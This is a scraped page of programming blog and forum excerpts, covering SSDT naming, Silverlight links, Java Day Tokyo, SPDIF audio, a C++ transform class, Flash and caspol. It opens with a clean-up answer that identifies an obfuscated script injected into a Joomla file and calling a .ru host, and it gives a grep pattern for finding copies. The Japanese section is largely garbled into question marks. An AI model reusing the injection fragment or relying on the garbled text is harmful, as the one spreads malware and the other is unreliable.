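    The obfuscated <script> block pasted above does not look like part of mod_mainmenu at all; it builds a script element pointing at an external .ru host and has the hallmarks of injected malware. Because the file's PHP block is never closed with ?> before it, the leading '<' of that script lands inside PHP code, which is a plausible source of the "unexpected '<'" parse error. A hedged clean-up sketch (the paths are examples and the search string is taken from the pasted code; adjust to the actual site layout):

        # find other files carrying the same injected fragment
        grep -rl "var Zl;if(Zl!=" /home/future/public_html
        # then restore default.php from a known-good Joomla 1.5 copy after removing the injection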

    Read the article

  • SSDT - What's in a name?

    - by jamiet
    SQL Server Data Tools (SSDT) recently got released as part of SQL Server 2012 and, depending on who you believe, it can be described as either: a suite of tools for building SQL Server database solutions, or a suite of tools for building SQL Server database, Integration Services, Analysis Services & Reporting Services solutions. Certainly the SQL Server 2012 installer seems to think it is the latter, because it describes SQL Server Data Tools as "the SQL server development environment, including the tool formerly named Business Intelligence Development Studio. Also installs the business intelligence tools and references to the web installers for database development tools", as you can see here: Strange then that, seemingly, there is no consensus within Microsoft about what SSDT actually is. On yesterday's blog post First Release of SSDT Power Tools reader Simon Lampen asked the quite legitimate question: "I understand (rightly or wrongly) that SSDT is the replacement for BIDS for SQL 2012 and have just installed this. If this is the case can you please point me to how I can edit rdl and rdlc files from within Visual Studio 2010 and import MS Access reports." To which came the following reply: "SSDT doesn't include any BIDs (sic) components. Following up with the appropriate team (Analysis Services, Reporting Services, Integration Services) via their forum or msdn page would be the best way to answer your questions about these kinds of services." That's from a Microsoft employee, by the way. Simon is even more confused by this and replies with: "I have done some more digging and am more confused than ever. This documentation (and many others): msdn.microsoft.com/.../ms156280.aspx expressly states that SSDT is where report editing tools are to be found." And on it goes.... You can see where Simon's confusion stems from. He has official documentation stating that SSDT includes all the stuff for building SSIS/SSAS/SSRS solutions (this is confirmed in the installer, remember) yet someone from Microsoft tells him "SSDT doesn't include any BIDs components". I have been close to this for a long time (all the way through the CTPs) so I can kind of understand where the confusion stems from. To my understanding, SSDT was originally the name of the database dev stuff, but eventually that got expanded to include all of the dev tools - I guess not everyone in Microsoft got the memo. Does this sound familiar? Have we not been down this road before? The database dev tools have had umpteen names over the years (do any of datadude, TSData, VSTS for DB Pros, DBPro, VS2010 Database Projects sound familiar?) and I was hoping that the SSDT moniker would put all confusion to bed - evidently it's as complicated now as it has ever been. Forgive me for whinging, but putting meaningful, descriptive, accurate, well-defined and easily-communicated names onto a product doesn't seem like a difficult thing to do. I guess I'm mistaken! Onwards and upwards... @Jamiet

    Read the article

  • Visual Studio Talk Show #117 is now online - Microsoft Surface (French)

    http://www.visualstudiotalkshow.com Simon Ferquel and Thomas Lebrun: Microsoft Surface. We talk with Simon Ferquel and Thomas Lebrun about the "Surface" computing system. Surface presents itself to the user as a table whose top is a "multitouch" touch-sensitive display that lets you manipulate digital content through a touch screen. Thomas Lebrun is an architect and developer at Access IT Paris. He is particularly interested... Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

  • Silverlight Cream for March 07, 2011 -- #1055

    - by Dave Campbell
    In this Issue: Max Paulousky, Chris Rouw, David Anson, Jesse Liberty, Shawn Wildermuth, Simon Guindon, and Dhananjay Kumar. Above the Fold: Silverlight: "Faster Databinding in WPF and Silverlight using OptimizedObservableCollection" Simon Guindon WP7: "Phoney Tools Updated (WP7 Open Source Library)" Shawn Wildermuth From SilverlightCream.com: Problems With Sharing Windows Phone 7 Applications Within A Large Group Of Beta Testers Max Paulousky has a post up discussing the issues surrounding beta testing a WP7 app with a large group of testers... and how to pull it all off. WP7 Insights #1: Consuming REST APIs within a WP7 app Chris Rouw is beginning a WP7 series based on his recent experience of getting a client's app into the marketplace. This first in his series is on consuming REST APIs ... lots of good code and explanations. Improving Windows Phone 7 application performance is even easier with these LowProfileImageLoader and DeferredLoadListBox updates David Anson has an update to his LowProfileImageLoader and DeferredLoadListBox after issues brought up by readers... so we all win with the great feedback from alert devs. When Isolated Storage Isn’t Enough Jesse Liberty started looking at Jeremy Likness' Sterling with this post in the WP7 From Scratch series. He starts with downloading it from CodePlex ... great way to get into Sterling if you haven't already. Phoney Tools Updated (WP7 Open Source Library) Shawn Wildermuth has the latest drop of his Phoney Tools up... this is the last Alpha. I've added a tag for it as well. He's fixed some things, added others... check out the post and go grab the code. Faster Databinding in WPF and Silverlight using OptimizedObservableCollection Simon Guindon is a blogger I've not been following, but this post on an OptimizedObservableCollection caught my eye. He added an AddRange() to the ObservableCollection to get a speed enhancement when adding items... and a pretty good speed enhancement it is. Reading files asynchronously using WebClient class in Silverlight Dhananjay Kumar is another prolific blogger that I've not been following, so we'll start with his latest... a step-by-step guide to reading an XML file asynchronously. Stay in the 'Light! Twitter SilverlightNews | Twitter WynApse | WynApse.com | Tagged Posts | SilverlightCream Join me @ SilverlightCream | Phoenix Silverlight User Group Technorati Tags: Silverlight    Silverlight 3    Silverlight 4    Windows Phone MIX10

    Read the article

  • Java Day Tokyo 2014 ????????

    - by OTN-J Master
    5?22?(?)???????????????Java Day Tokyo 2014?????????????????Create the Future with Java??????Java?????????????????????Java???????????????????????????????????Java 8??Java 8????????(3?)??????????????????????????????????????? ¦ IoT?????Java-???????????????????????????Java?????????????????????????????? (????Nandini Ramani?Cameron Purdy?Simon Ritter)Nandini Ramani??Java SE?Java ME??Cameron Purdy?Java EE??Simon Ritter?Java????????????????????????????????????????????Java SE 8?????????????Oracle Java for MIPS(32???/64????)????????????????????????OTN?????????????????????????Java????????????????????????¦??????????????????IoT????????3????????????????????JavaOne 2013???????????????????????????????????????????????????????·Lego Mindstorms?????Stephen Chin(Java Technology Ambassador)???????????Lego Duke Segway????Lego Mindstorms??????????????????Duke???2????????????????????????????????????????????????????????????????????????????????????????????????????????? ??????????Duke Segway????????????????Duke?????????????????????????????????????????????? ·DukePadRaspberry Pi ??????Java SE Embedded?????????????????????????????????????JavaFX???????????????????????????????????????????????????????????(??????????????)????????????????????????????????????????????????????????????????????????? ·Chess RobotDukePad????????????????????????????????????DukePad??????????????????????????????????????????????????????????????¦Java???????2015??Java????20???????(?????????!)???Java?????????????????????????????????????????Java???????????????????????????????????????????????????????????????????????????????¦Java Magazine ????Java????????????????????????????????????????????????????????????Java 8 ?????????????????IoT???????????????????????????????????????????????????????????????????????????????????????????????Java????????????????????????????????????????????????????????????????????????Java Magazine????????????????????????????????????Java Magazine ????????OTN?????????Java????????????PDF??????eBook???????????????????? ??????????Facebook???:Java Day TokyoJava Day Tokyo 2013

    Read the article

  • JavaOne 2012 demo of Java SE Embedded on Raspberry Pi

    - by hinkmond
    Here's the Inquirer's article about our Java SE Embedded demos at JavaOne 2012 this year. Simon Ritter had a fun presentation showing the cool demo on the Raspberry Pi at his talk. See: Demo Java SE Embedded on Raspberry Pi Here's a quote: Oracle demonstrated Java SE for embedded devices running on the Raspberry Pi bare bones computer at the Java One show on Wednesday, with the aim of encouraging developers to try it out for themselves to create reference libraries for the target school children audience. I had the presentation after Simon and saw the size crowd he had. They were laughing and clapping at the demo and having a good ol' time. Good to see the interest in Java SE Embedded, even if it is for a "toy" device like the Raspberry Pi. Hinkmond

    Read the article

  • Optical SPDIF audio from motherboard not working with receiver

    - by simon b
    Hi, I hope someone can help; I can't get my SPDIF optical out working through my receiver, and all the responses I can see on the web assume you have a sound card, while I settled for the (seemingly high-end) sound on my motherboard (Asus P7P55D-E PRO), which appears to limit some of my options. My set-up is a "new out of the box" one and is:

    * Windows 7 PC (using PowerDVD10 for DVDs/Blu-rays and Windows Media Player for music)
    * Asus P7P55D-E PRO motherboard - has 8-channel audio TRS jacks and SPDIF optical and coaxial out
    * An old Yamaha receiver, whose only multi-channel input options are optical in and 6-channel RCA in. However, it can still handle DTS and DD
    * Boston Acoustic Soundware XS 5.1 speakers

    I've currently got the SPDIF optical out from the motherboard connected to the optical in on my receiver, have SPDIF enabled in the sound menu, and the light is glowing red down the fibre. But I'm getting no sound at all. What I want is to be able to play DVDs/Blu-rays in 5.1 but also to be able to play music in multi-channel mode (even though I know this will be "fake" multichannel; it's more about where I sit in the room and my requirement to use the sub, because the Boston is a satellite/sub set-up). My questions are:

    * Will optical work at all for multi-channel? The latest posts I can see suggest it does, but some people seem to say optical only outputs stereo. Whom to believe?
    * Even if it does work, I've read that I have to disable AC-3 decoding, or make various other changes, which don't seem to be possible without the menu options that a sound card brings. Is the motherboard-only option just too inflexible?
    * Although my SPDIF device is enabled in the sound menu, it insists under "Jack information" that it is a "rear panel RCA jack", when of course it is not (both TOSLINK and RCA jacks do exist). Has the PC just forgotten that it has an optical out?
    * I think I could relatively easily connect the 8-channel 3.5mm TRS jacks to my receiver's 6-channel input jacks by way of TRS/RCA cables, but would that not stop me from being able to play music from Media Player in multi-channel mode, as I'm not sure the motherboard can cope?
    * Or do I need to bite the bullet and buy a sound card? And if so, how can I be sure the one I get doesn't have the same problem?

    Any thoughts gratefully received. Cheers, simon

    Read the article

  • Do I need to store a generic rotation point/radius for rotating around a point other than the origin for object transforms?

    - by Casey
    I'm having trouble implementing a non-origin point rotation. I have a class Transform that stores each component separately in three 3D vectors for position, scale, and rotation. This is fine for local rotations based on the center of the object. The issue is how do I determine/concatenate non-origin rotations in addition to origin rotations. Normally this would be achieved as a Transform-Rotate-Transform for the center rotation followed by a Transform-Rotate-Transform for the non-origin point. The problem is because I am storing the individual components, the final Transform matrix is not calculated until needed by using the individual components to fill an appropriate Matrix. (See GetLocalTransform()) Do I need to store an additional rotation (and radius) for world rotations as well or is there a method of implementation that works while only using the single rotation value? Transform.h #ifndef A2DE_CTRANSFORM_H #define A2DE_CTRANSFORM_H #include "../a2de_vals.h" #include "CMatrix4x4.h" #include "CVector3D.h" #include <vector> A2DE_BEGIN class Transform { public: Transform(); Transform(Transform* parent); Transform(const Transform& other); Transform& operator=(const Transform& rhs); virtual ~Transform(); void SetParent(Transform* parent); void AddChild(Transform* child); void RemoveChild(Transform* child); Transform* FirstChild(); Transform* LastChild(); Transform* NextChild(); Transform* PreviousChild(); Transform* GetChild(std::size_t index); std::size_t GetChildCount() const; std::size_t GetChildCount(); void SetPosition(const a2de::Vector3D& position); const a2de::Vector3D& GetPosition() const; a2de::Vector3D& GetPosition(); void SetRotation(const a2de::Vector3D& rotation); const a2de::Vector3D& GetRotation() const; a2de::Vector3D& GetRotation(); void SetScale(const a2de::Vector3D& scale); const a2de::Vector3D& GetScale() const; a2de::Vector3D& GetScale(); a2de::Matrix4x4 GetLocalTransform() const; a2de::Matrix4x4 GetLocalTransform(); protected: private: a2de::Vector3D _position; a2de::Vector3D _scale; a2de::Vector3D _rotation; std::size_t _curChildIndex; Transform* _parent; std::vector<Transform*> _children; }; A2DE_END #endif Transform.cpp #include "CTransform.h" #include "CVector2D.h" #include "CVector4D.h" A2DE_BEGIN Transform::Transform() : _position(), _scale(1.0, 1.0), _rotation(), _curChildIndex(0), _parent(nullptr), _children() { /* DO NOTHING */ } Transform::Transform(Transform* parent) : _position(), _scale(1.0, 1.0), _rotation(), _curChildIndex(0), _parent(parent), _children() { /* DO NOTHING */ } Transform::Transform(const Transform& other) : _position(other._position), _scale(other._scale), _rotation(other._rotation), _curChildIndex(0), _parent(other._parent), _children(other._children) { /* DO NOTHING */ } Transform& Transform::operator=(const Transform& rhs) { if(this == &rhs) return *this; this->_position = rhs._position; this->_scale = rhs._scale; this->_rotation = rhs._rotation; this->_curChildIndex = 0; this->_parent = rhs._parent; this->_children = rhs._children; return *this; } Transform::~Transform() { _children.clear(); _parent = nullptr; } void Transform::SetParent(Transform* parent) { _parent = parent; } void Transform::AddChild(Transform* child) { if(child == nullptr) return; _children.push_back(child); } void Transform::RemoveChild(Transform* child) { if(_children.empty()) return; _children.erase(std::remove(_children.begin(), _children.end(), child), _children.end()); } Transform* Transform::FirstChild() { if(_children.empty()) return nullptr; return 
*(_children.begin()); } Transform* Transform::LastChild() { if(_children.empty()) return nullptr; return *(_children.end()); } Transform* Transform::NextChild() { if(_children.empty()) return nullptr; std::size_t s(_children.size()); if(_curChildIndex >= s) { _curChildIndex = s; return nullptr; } return _children[_curChildIndex++]; } Transform* Transform::PreviousChild() { if(_children.empty()) return nullptr; if(_curChildIndex == 0) { return nullptr; } return _children[_curChildIndex--]; } Transform* Transform::GetChild(std::size_t index) { if(_children.empty()) return nullptr; if(index > _children.size()) return nullptr; return _children[index]; } std::size_t Transform::GetChildCount() const { if(_children.empty()) return 0; return _children.size(); } std::size_t Transform::GetChildCount() { return static_cast<const Transform&>(*this).GetChildCount(); } void Transform::SetPosition(const a2de::Vector3D& position) { _position = position; } const a2de::Vector3D& Transform::GetPosition() const { return _position; } a2de::Vector3D& Transform::GetPosition() { return const_cast<a2de::Vector3D&>(static_cast<const Transform&>(*this).GetPosition()); } void Transform::SetRotation(const a2de::Vector3D& rotation) { _rotation = rotation; } const a2de::Vector3D& Transform::GetRotation() const { return _rotation; } a2de::Vector3D& Transform::GetRotation() { return const_cast<a2de::Vector3D&>(static_cast<const Transform&>(*this).GetRotation()); } void Transform::SetScale(const a2de::Vector3D& scale) { _scale = scale; } const a2de::Vector3D& Transform::GetScale() const { return _scale; } a2de::Vector3D& Transform::GetScale() { return const_cast<a2de::Vector3D&>(static_cast<const Transform&>(*this).GetScale()); } a2de::Matrix4x4 Transform::GetLocalTransform() const { Matrix4x4 p((_parent ? _parent->GetLocalTransform() : a2de::Matrix4x4::GetIdentity())); Matrix4x4 t(a2de::Matrix4x4::GetTranslationMatrix(_position)); Matrix4x4 r(a2de::Matrix4x4::GetRotationMatrix(_rotation)); Matrix4x4 s(a2de::Matrix4x4::GetScaleMatrix(_scale)); return (p * t * r * s); } a2de::Matrix4x4 Transform::GetLocalTransform() { return static_cast<const Transform&>(*this).GetLocalTransform(); } A2DE_END
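    As a general identity (not code from the engine above), a rotation about an arbitrary pivot point p can be expressed by translating the pivot to the origin, rotating, and translating back:

        M_pivot = T(p) · R · T(-p)

    With the local transform built above as P · T(position) · R · S, replacing R by M_pivot gives P · T(position) · T(p) · R · T(-p) · S, so the only extra state needed alongside the existing position/rotation/scale components is the pivot point itself (plus a radius only if the object should orbit rather than spin in place).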

    Read the article

  • Flash Player 10.1 crash on shared object access

    - by Simon
    Hi all, since updating my Flash Player plugin from 10 to 10.1, I'm seeing a weird crash when accessing shared objects. Flex Builder's debugger pops up and prints a stack trace like this:

        undefined
            at flash.net::SharedObject$/getLocal()
            at my.code::MyClass$/load()[/my/path/to/my/MyClass.as:27]
        (...)

    This happens when calling SharedObject.getLocal("someString") for the second time for the same string, though it doesn't always crash. When using another browser on the same machine (not configured as the preferred debugging browser in Flex Builder), Flash Player remains silent. The code is wrapped in a try/catch(Error) block which does not catch this error. I'm using Flex SDK 3.5 and Flex Builder 3 on Mac OS X 10.6.3. Has anyone else seen this? Thanks, Simon

    Read the article

  • C#/.Net Download file from premium rapidshare account

    - by Simon
    Hello, how can I log in to a premium RapidShare account from my code? I tried this, but it is not working:

        string authInfo = "name" + ":" + "pass";
        authInfo = Convert.ToBase64String(Encoding.Default.GetBytes(authInfo));
        client.Headers["Authorization"] = "Basic " + authInfo;
        client.DownloadFile("url", "C:\\Temp\\aaaa.file");

    OR

        WebClient client = new WebClient();
        client.Credentials = new NetworkCredential("name", "pass");
        client.DownloadFile("url", "C:\\Temp\\aaaa.file");

    Is there any simple way to download the file directly with a RapidShare premium account? Thank you a lot! Regards, simon

    Read the article

  • Caspol, VMs, Mapped Drives, VS2010

    - by Simon Woods
    Hi, I have a VM (Win7 32-bit) with VS2010 installed. I have a drive mapped into it from the host machine (64-bit), where I have some of my VS2010 projects and to where I am building them. One of my projects is looking to load an assembly. If I copy that assembly to a local drive, the program runs fine. If I leave it on the mapped drive, then I get an error:

        Exception is: FileLoadException - Could not load file or assembly 'file:///Z:\BusinessTier\bin\Debug\BusinessTier.dll

    I am unsure whether or not I need to run Caspol. There is another post on SO which pointed me to a post indicating that VS2008 SP1+ removed the need for caspol with respect to network drives, but I wondered if I still need it because I am in a VM. I have tried running the following on the host machine in an attempt to give permissions to VS inside the VM, but to no avail:

        C:\Windows\Microsoft.NET\Framework\v4.0.30128>caspol -m -ag 1.2 -url file://g:\* FullTrust

    where g: is the drive being mapped into the VM (as drive z:). What am I missing (apart from understanding!)? Thx Simon
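    One thing worth checking (a sketch, not a verified fix): code-access policy is evaluated on the machine that actually loads the assembly, so the caspol command would need to run inside the 32-bit Win7 VM, against the path as the VM sees it (Z:), rather than on the host against G:. For example:

        C:\Windows\Microsoft.NET\Framework\v4.0.30128>caspol -m -ag 1.2 -url file://Z:\* FullTrust

    (If the project targets .NET 4.0, CAS policy is largely ignored and the loadFromRemoteSources runtime setting governs loads from network shares instead.)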

    Read the article
